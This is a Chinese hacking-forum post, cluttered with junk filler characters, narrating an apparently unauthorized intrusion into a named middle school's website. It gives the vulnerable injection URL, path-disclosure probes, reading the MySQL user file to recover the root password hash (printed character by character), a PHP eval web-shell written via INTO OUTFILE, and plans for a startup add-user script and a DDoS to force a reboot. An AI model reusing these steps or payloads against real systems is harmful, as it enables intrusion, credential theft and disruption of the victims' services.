找回密码
 立即注册
查看: 3764|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
3 N. V0 L( f8 U, h' G发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!9 h# _( e% _+ m& O

' O# J  Y  j7 ?8 [! S
2 c. N9 \: y) q9 o
" C7 ?/ K% y5 Q- k常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 - M6 I7 R, _* Y( C$ L/ H( M3 J

8 H  X2 ?# y+ l! ^* }那么想可以直接写入shell ,getshell有几个条件:+ [3 A3 ]+ A# u" L" k
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF1 ~9 j+ t; N6 ~$ F! c: [+ u: a

, e% J- w5 Y0 Z试着爆绝对路径:
. K0 S1 J7 U  r) F' V7 ?1./phpMyAdmin/index.php?lang[]=1  
3 s7 T+ q% v# Y" f+ W  V2./phpMyAdmin/phpinfo.php  
: |& u4 q3 f+ s$ W% V7 s. \3./load_file()  , o6 j# v2 b0 U
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  7 P. s7 ~1 `( i! Y, K5 ^0 [: t  m
5./phpmyadmin/libraries/select_lang.lib.php  # [. P5 O7 ]% ^* \/ A
6./phpmyadmin/libraries/lect_lang.lib.php  
2 y3 n- M0 l6 x7./phpmyadmin/libraries/mcrypt.lib.php   
. c6 o1 A/ V' s4 M( k8./phpmyadmin/libraries/export/xls.php  
; _. H: o" R1 G$ `8 o, M# @2 {+ ]+ U3 y) x0 K5 s
均不行...........................
4 G, v/ _% F4 a7 b# j+ _" L' a
* F$ A$ i0 A# T: q御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
8 g& A! ^* g' A: e) z+ P8 g1 r9 _. M0 r& c! K
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 0 V" C- S/ p5 _6 f1 K- r

& q$ D% K  r9 G8 R6 a1 C8 P默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
% A$ S6 M9 M6 z( Y. s2 R& S5 [
6 |9 b' C6 N% f! H, b2 N' B敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
3 H$ {& o  k- k9 i5 g: I) h: M6 y' N
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
2 `# j1 _' n; G) c) T
4 e* d$ c1 Q; G9 i  O3 V' {http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini , O: b& s; |; Z  _$ d$ n6 G
) B* b+ t( V" R8 v5 u
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD   y$ M3 a, H# \5 F3 J& ^

; P0 }& R' p+ A' I- H4 B  B成功读到root密码:
* f" S- @) d4 k- H9 L7 N
* _8 c& P+ Z! H" j, T  {17---- r(0072)5 T- E1 r$ [: L) N: ^
18---- o(006f)$ @! Y) t6 }2 A  Z
19---- o(006f)
: U6 A& q7 B5 M3 |. b* Q! }+ u20---- t(0074)5 u4 n% k3 Q7 F" j  w0 X1 F7 o  k" B
21---- *(002a)
9 |8 [8 b( i* Y* o  I22---- 8(0038)# O$ i4 K' Z4 J# x
23---- 2(0032)% @* d1 F9 d6 X, [
24---- E(0045)( {; h, I0 g7 }3 o/ x$ |
25---- 1(0031)+ A8 A; O7 S/ `/ ?' D
26---- C(0043)
: I7 t( j* |: ]/ @3 t4 D/ v9 N) w27---- 5(0035); p/ z5 n  l  y% ?. e
28---- 8(0038)
; B' c! W$ {- {! d29---- 2(0032)
3 [0 F" K7 _3 B' N30---- 8(0038)
3 H. M2 j2 L7 Z$ a4 ~31---- A(0041), S/ V# r" a$ c, z! B
32---- 9(0039)
+ Z0 U) F0 n" d2 \33---- B(0042)* h' W+ H: \# s& y
34---- 5(0035)5 R  L- d$ ^- h* f) d8 c/ R
35---- 4(0034)  X0 J* Q" m6 a. Z1 G- J
36---- 8(0038)' {& H# z& T$ X5 S6 w9 ~0 O. {
37---- 6(0036)
+ d3 @) i4 S- W" B! c# Y1 c38---- 4(0034)' n9 V& p$ O' r2 D/ A
39---- 9(0039)
; M$ s, M8 M4 \6 O: O40---- 1(0031)
' D+ |6 t  ^; i- y4 R41---- 1(0031)
4 l  u7 E1 U  c4 ]- J$ x4 j" {42---- 5(0035)
& F* ]' o9 n/ t43---- 3(0033)
5 c: y6 }0 H1 R0 K7 @44---- 5(0035)6 x3 Z% b# E: Z
45---- 9(0039)  F) J% i9 ~' n
46---- 8(0038)
! Q- `! r: ]& L7 A: G47---- F(0046)6 s9 ]. b% m$ y% t! }, b8 v3 o
48---- F(0046)* _1 Y+ m4 n  u. q) h, o# r) V
49---- 4(0034)  `4 T) S7 ^1 l4 O
50---- F(0046)% @/ L! S  a6 @0 M# Z  \
51---- 0(0030)5 f+ ]3 z8 s9 G
52---- 3(0033)
, ?7 @; ^! R  n3 ~53---- 2(0032)
8 o) L- n# l  k& {" e8 j: B# s: v54---- A(0041)  b( {! r. c; `1 Z7 t$ h
55---- 4(0034)
1 \% o0 V3 @2 u56---- A(0041)
. L0 f" u4 o5 ]& x57---- B(0042)
# c) I8 g5 y' w8 h& ~58---- *(0044)
0 R! ^9 A+ A) B. G, l7 L. m59---- *(0035)
* W8 M1 e# P! a' _+ T. I60---- *(0041)/ [' D$ S' U/ H6 m/ e* I
61---- *0032)2 I  }* y; E7 B' ~

) p& N% j8 Y, U/ }解密后成功登陆phpmyamin
0 q: ?0 I  j7 c/ o9 F                          , ]( K5 n7 e! A/ W# J) f/ o/ Q" B
4 G7 p4 k/ m- {1 ?
                             1 {6 m. N6 T  G) e/ k0 S- Q; v6 ^" O
; M" `( S: `. O/ M
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php') Q! l& R. x2 ]& I8 g% ^( O

( V6 q9 r7 v: {, \* v0 K( T' [. R成功执行,拿下shell,菜刀连接:
. v6 V2 h" O' W
! D* `/ e( N& L服务器不支持asp,aspx,php提权无果...................
, W0 x& a3 [7 Q) X1 ?2 U& ~& [; y* P* Z4 X' S' k8 w
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:4 N8 i# W2 T9 w* {  _7 B
服务器上已经有个隐藏帐号了
# V1 i  M7 y3 Q; k3 `
别名     administrators) v( d" f8 B7 N! e7 d% T1 m
注释     管理员对计算机/域有不受限制的完全访问权
+ K6 A( B$ ~& x$ @' X
成员
. g; S$ V/ M( X
-------------------------------------------------------------------------------% u  c& A; f- J6 w
admin
: o5 |( K# x  W- G8 wAdministrator. @0 E& x) V! Y
slipper$
5 x' K. e! ]" g% \$ Xsqluser3 ~( s. \2 p' ^' O' j
命令成功完成。 # P! {- T  e4 c. t: w8 d

$ r( Q7 E7 K/ x( q3 I4 }- W; L% T服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。& s! K4 F6 z7 I8 n8 H0 r, @* ]+ P0 ~5 M

( U  U1 b! o0 I  rddos服务器重启,不然就只能坐等服务器重启了...............................
/ a7 i" x  x9 w. S# n/ g% _8 N& j8 E/ @, N: L3 s6 z3 V9 _2 D  K
      

& [% F% y  _- c9 _

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表